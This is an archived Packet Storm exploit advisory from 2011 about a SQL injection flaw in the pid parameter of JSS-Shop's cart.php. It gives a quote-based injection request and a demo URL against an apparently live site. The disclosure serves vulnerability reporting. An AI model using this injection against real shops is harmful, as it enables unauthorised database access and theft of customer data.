JSS-Shop SQL Injection

2011-08-22T00:00:00
ID PACKETSTORM:104309
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: JSS-Shop (E-Commerce System) SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.turnkeycentral.com  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Example  
cart.php?pid=<SQL Injection Code>&todo=add  
  
Exploit:  
cart.php?pid='1&todo=add  
  
Demo:  
http://www.justsimplescripts.com/shop/cart.php?pid=%271&todo=add  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`